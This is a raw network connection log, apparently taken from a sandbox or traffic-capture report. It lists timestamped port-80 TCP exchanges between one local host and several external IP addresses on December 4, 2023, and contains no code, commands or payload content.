                                                                                                                              Dec 4, 2023 15:25:24.279511929 CET5017580192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:24.279675961 CET5017580192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:24.374972105 CET8050175172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:24.525379896 CET8050175172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:24.525449038 CET8050175172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:24.525988102 CET5017580192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:24.526055098 CET5017580192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:24.621489048 CET8050175172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:29.764801025 CET5017680192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:29.947263956 CET805017691.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:29.947519064 CET5017680192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:29.947700977 CET5017680192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:30.130614042 CET805017691.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:30.130683899 CET805017691.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:30.130892992 CET5017680192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:31.461491108 CET5017680192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:32.477080107 CET5017780192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:32.659976006 CET805017791.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:32.660193920 CET5017780192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:32.660418987 CET5017780192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:32.843151093 CET805017791.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:32.843240976 CET805017791.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:32.843456030 CET5017780192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:34.164046049 CET5017780192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:35.179563999 CET5017880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:35.362181902 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.362304926 CET5017880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:35.363706112 CET5017880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:35.363744974 CET5017880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:35.363795042 CET5017880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:35.545361996 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.545409918 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.545449972 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.545476913 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.545504093 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.545798063 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.545811892 CET5017880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:35.545867920 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.545898914 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.545964956 CET5017880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:35.546066046 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.546138048 CET5017880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:35.546298981 CET5017880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:35.601222038 CET5017880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:35.727781057 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.727914095 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.728013992 CET5017880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:35.728136063 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.728164911 CET5017880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:35.728204966 CET5017880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:35.728380919 CET5017880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:35.728440046 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.728507996 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.728552103 CET5017880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:35.728775978 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.728826046 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.729118109 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.729281902 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.910310030 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.910878897 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.910960913 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.911011934 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.911051989 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.911370993 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.911437988 CET805017891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:35.911613941 CET5017880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:36.866575003 CET5017880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:37.882333994 CET5017980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:38.064877987 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.065202951 CET5017980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:38.065289021 CET5017980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:38.288116932 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.315094948 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.315133095 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.315304995 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.315315008 CET5017980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:38.315359116 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.315491915 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.315534115 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.315538883 CET5017980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:38.315587044 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.315623999 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.315650940 CET5017980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:38.315671921 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.315699100 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.315896034 CET5017980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:38.497885942 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.497993946 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.498100996 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.498171091 CET5017980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:38.498239040 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.498306990 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.498367071 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.498426914 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.498486996 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.498501062 CET5017980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:38.498569965 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:38.498590946 CET5017980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:38.498668909 CET5017980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:38.498852015 CET5017980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:38.498982906 CET5017980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:38.681551933 CET805017991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.609569073 CET5018080192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:43.704158068 CET805018076.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.704427958 CET5018080192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:43.704528093 CET5018080192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:43.799515963 CET805018076.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.813873053 CET805018076.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.813963890 CET805018076.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.814032078 CET805018076.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.814075947 CET805018076.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.814116001 CET805018076.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.814156055 CET805018076.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.814183950 CET5018080192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:43.814198971 CET805018076.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.814244032 CET5018080192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:43.814246893 CET805018076.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.814440966 CET5018080192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:43.829004049 CET805018076.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.829246998 CET5018080192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:45.208415985 CET5018080192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:46.224150896 CET5018180192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:46.318927050 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.319103003 CET5018180192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:46.319391012 CET5018180192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:46.414114952 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.426790953 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.426857948 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.426902056 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.426942110 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.426980972 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.427020073 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.427062035 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.427107096 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.427114964 CET5018180192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:46.427216053 CET5018180192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:46.427433014 CET5018180192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:46.440654993 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.440833092 CET5018180192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:47.832941055 CET5018180192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:48.848481894 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:48.943392992 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:48.943602085 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:48.944977999 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:48.945070982 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.040302992 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.040579081 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.040803909 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.040884972 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.040930033 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.040968895 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.041009903 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.041023970 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.041085005 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.041152000 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.041199923 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.041239977 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.041245937 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.041568995 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.041738033 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.052531004 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.052640915 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.052695036 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.052743912 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.052813053 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.052876949 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.052920103 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.052964926 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.053067923 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.053419113 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.065685987 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.065916061 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.137108088 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.137181044 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.137252092 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.137300014 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.137399912 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.137466908 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.137496948 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.137561083 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.137677908 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.137734890 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.137799978 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.137959957 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.138401985 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.232652903 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.232748032 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.232872009 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.233241081 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.233308077 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.233437061 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:50.457417965 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:51.472860098 CET5018380192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:51.567593098 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.567815065 CET5018380192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:51.567981958 CET5018380192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:51.669775963 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.683687925 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.683716059 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.683738947 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.683772087 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.683794022 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.683818102 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.683986902 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.684015989 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.684039116 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.684078932 CET5018380192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:51.684464931 CET5018380192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:51.684560061 CET5018380192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:51.696722984 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.696993113 CET5018380192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:51.779362917 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:59.736912012 CET5018480192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:25:59.909193039 CET805018454.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:59.909482002 CET5018480192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:25:59.909645081 CET5018480192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:26:00.128617048 CET805018454.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:02.051954031 CET805018454.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:02.052027941 CET805018454.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:02.052365065 CET5018480192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:26:02.052365065 CET5018480192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:26:02.224736929 CET805018454.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:15.280255079 CET5018580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:15.404048920 CET805018574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:15.404314995 CET5018580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:15.404470921 CET5018580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:15.527930021 CET805018574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:15.535440922 CET805018574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:15.535646915 CET805018574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:15.536035061 CET5018580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:16.904596090 CET5018580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:17.920152903 CET5018680192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:18.043874025 CET805018674.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:18.044146061 CET5018680192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:18.044367075 CET5018680192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:18.167748928 CET805018674.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:18.172804117 CET805018674.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:18.172823906 CET805018674.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:18.172971010 CET5018680192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:19.544668913 CET5018680192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.560322046 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.684868097 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.685237885 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.686492920 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.686585903 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.810899019 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.810976028 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.811038971 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.811073065 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.811083078 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.811235905 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.811258078 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.811335087 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.811376095 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.811400890 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.811435938 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.811477900 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.811578035 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.811671019 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.811744928 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.811986923 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.941819906 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.941901922 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.941943884 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.942006111 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.942049026 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.942089081 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.942143917 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.942151070 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.942338943 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.942460060 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.942500114 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.942504883 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.942544937 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.942696095 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.942853928 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.942928076 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.942970991 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.943010092 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.943048954 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.944554090 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.944734097 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.944792986 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.944834948 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:21.066500902 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:21.066581964 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:21.066627979 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:21.067945957 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:21.068068027 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:21.068129063 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:21.068171024 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:21.068211079 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:21.068249941 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:21.068289042 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:21.068329096 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:21.068370104 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:21.073816061 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:21.073884964 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:21.074188948 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:22.200368881 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:23.215873003 CET5018880192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:23.340548992 CET805018874.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:23.340886116 CET5018880192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:23.341065884 CET5018880192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:23.465420961 CET805018874.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:23.470704079 CET805018874.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:23.471254110 CET805018874.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:23.471461058 CET5018880192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:23.471461058 CET5018880192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:23.595710039 CET805018874.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:36.822359085 CET5018980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:36.932071924 CET8050189216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:36.932244062 CET5018980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:36.932413101 CET5018980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:37.070503950 CET8050189216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:37.070596933 CET8050189216.40.34.41192.168.11.20
